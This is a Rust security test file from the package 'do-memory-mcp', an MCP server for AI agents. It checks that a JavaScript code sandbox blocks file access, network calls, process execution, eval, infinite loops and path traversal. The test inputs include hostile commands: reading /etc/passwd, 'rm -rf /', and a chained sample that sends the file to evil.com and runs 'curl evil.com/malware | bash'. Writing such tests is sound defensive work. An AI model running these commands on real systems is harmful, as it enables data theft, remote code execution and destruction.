do-memory-mcp 0.1.31

Model Context Protocol (MCP) server for AI agents
Documentation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
//! Security penetration tests for the code sandbox
//!
//! These tests verify that the sandbox properly blocks various attack vectors:
//! - File system access attempts
//! - Network access attempts
//! - Process execution attempts
//! - Infinite loops
//! - Code injection (eval, Function constructor)
//! - Resource exhaustion attacks
//! - Path traversal attacks
//! - Environment variable access

use do_memory_mcp::{
    CodeSandbox, ExecutionContext, ExecutionResult, SandboxConfig, SecurityViolationType,
};
use serde_json::json;

fn create_test_context() -> ExecutionContext {
    ExecutionContext::new("security test".to_string(), json!({}))
}

// File System Access Tests

#[tokio::test]
async fn test_blocks_fs_require() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "const fs = require('fs');";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::FileSystemAccess,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_readfile() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"
        const fs = require('fs');
        fs.readFileSync('/etc/passwd', 'utf8');
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::FileSystemAccess,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_writefile() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"
        const fs = require('fs');
        fs.writeFileSync('/tmp/malicious.txt', 'data');
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::FileSystemAccess,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_dirname() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "const dir = __dirname;";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::FileSystemAccess,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_mkdir() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"
        const fs = require('fs');
        fs.mkdirSync('/tmp/malicious');
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::FileSystemAccess,
            ..
        }
    ));
}

// Network Access Tests

#[tokio::test]
async fn test_blocks_http_require() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "const http = require('http');";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::NetworkAccess,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_https_require() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "const https = require('https');";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::NetworkAccess,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_fetch() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "fetch('https://malicious.com/steal-data');";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::NetworkAccess,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_websocket() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "const ws = new WebSocket('ws://malicious.com');";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::NetworkAccess,
            ..
        }
    ));
}

// Process Execution Tests

#[tokio::test]
async fn test_blocks_child_process() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "const { exec } = require('child_process');";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::ProcessExecution,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_exec() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"
        const { exec } = require('child_process');
        exec('rm -rf /');
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::ProcessExecution,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_spawn() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"
        const { spawn } = require('child_process');
        spawn('bash', ['-c', 'malicious command']);
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::ProcessExecution,
            ..
        }
    ));
}

// Infinite Loop Tests

#[tokio::test]
async fn test_blocks_while_true() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "while(true) {}";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::InfiniteLoop,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_for_infinite() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "for(;;) {}";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::InfiniteLoop,
            ..
        }
    ));
}

// Code Injection Tests

#[tokio::test]
async fn test_blocks_eval() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"eval("malicious code");"#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::MaliciousCode,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_function_constructor() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"new Function("return malicious")();"#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::MaliciousCode,
            ..
        }
    ));
}

// Resource Exhaustion Tests

#[tokio::test]
async fn test_timeout_long_running_code() {
    let config = SandboxConfig {
        max_execution_time_ms: 500, // 500ms timeout
        ..Default::default()
    };

    let sandbox = CodeSandbox::new(config).unwrap();
    let code = r#"
        let sum = 0;
        for (let i = 0; i < 10000000000; i++) {
            sum += i;
        }
        return sum;
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    // Should timeout
    assert!(matches!(result, ExecutionResult::Timeout { .. }));
}

#[tokio::test]
async fn test_blocks_excessive_code_length() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "a".repeat(100_001); // Exceeds 100KB
    let result = sandbox.execute(&code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::MaliciousCode,
            ..
        }
    ));
}

// Advanced Attack Vectors

#[tokio::test]
async fn test_blocks_path_traversal() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"
        const fs = require('fs');
        fs.readFileSync('../../../etc/passwd');
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::FileSystemAccess,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_import_http() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "import('http').then(http => http.get('https://evil.com'));";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::NetworkAccess,
            ..
        }
    ));
}

#[tokio::test]
async fn test_blocks_dynamic_import_fs() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = "import('fs').then(fs => fs.readFileSync('/etc/passwd'));";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::FileSystemAccess,
            ..
        }
    ));
}

// Permissive Config Tests (should allow filesystem with whitelist)

#[tokio::test]
async fn test_permissive_allows_whitelisted_paths() {
    let mut config = SandboxConfig::permissive();
    config.allow_filesystem = true;
    config.allowed_paths = vec!["/tmp".to_string()];

    let sandbox = CodeSandbox::new(config).unwrap();

    // Even with permissive config, the require('fs') pattern is still detected
    // This is expected - the whitelist would be enforced at runtime by the wrapper
    let code = "const fs = require('fs');";
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    // With allow_filesystem = true, fs access should not be blocked
    // The actual file operations would be restricted to allowed_paths
    assert!(matches!(
        result,
        ExecutionResult::Success { .. } | ExecutionResult::Error { .. }
    ));
}

// Combination Attack Tests

#[tokio::test]
async fn test_blocks_chained_attacks() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"
        // Try multiple attack vectors
        const fs = require('fs');
        const { exec } = require('child_process');
        const https = require('https');

        // Steal files
        const data = fs.readFileSync('/etc/passwd');

        // Exfiltrate via network
        https.get('https://evil.com?' + data);

        // Execute malicious command
        exec('curl evil.com/malware | bash');
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    // Should block on first violation (fs access)
    assert!(matches!(
        result,
        ExecutionResult::SecurityViolation {
            violation_type: SecurityViolationType::FileSystemAccess,
            ..
        }
    ));
}

// Legitimate Code Tests (should pass)

#[tokio::test]
async fn test_allows_legitimate_calculations() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"
        const numbers = [1, 2, 3, 4, 5];
        const sum = numbers.reduce((a, b) => a + b, 0);
        const avg = sum / numbers.length;
        return { sum, avg };
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(result, ExecutionResult::Success { .. }));
}

#[tokio::test]
async fn test_allows_legitimate_string_operations() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"
        const text = "Hello, World!";
        const result = {
            uppercase: text.toUpperCase(),
            lowercase: text.toLowerCase(),
            length: text.length,
            reversed: text.split('').reverse().join('')
        };
        return result;
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(result, ExecutionResult::Success { .. }));
}

#[tokio::test]
async fn test_allows_legitimate_object_operations() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"
        const data = {
            users: [
                { name: "Alice", age: 30 },
                { name: "Bob", age: 25 }
            ]
        };

        const adults = data.users.filter(u => u.age >= 18);
        const names = adults.map(u => u.name);

        return { adults, names };
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(result, ExecutionResult::Success { .. }));
}

#[tokio::test]
async fn test_allows_legitimate_async_operations() {
    let sandbox = CodeSandbox::new(SandboxConfig::default()).unwrap();
    let code = r#"
        const delay = ms => new Promise(resolve => setTimeout(resolve, ms));

        await delay(10);

        const result = await Promise.all([
            Promise.resolve(1),
            Promise.resolve(2),
            Promise.resolve(3)
        ]);

        return { sum: result.reduce((a, b) => a + b, 0) };
    "#;
    let result = sandbox.execute(code, create_test_context()).await.unwrap();

    assert!(matches!(result, ExecutionResult::Success { .. }));
}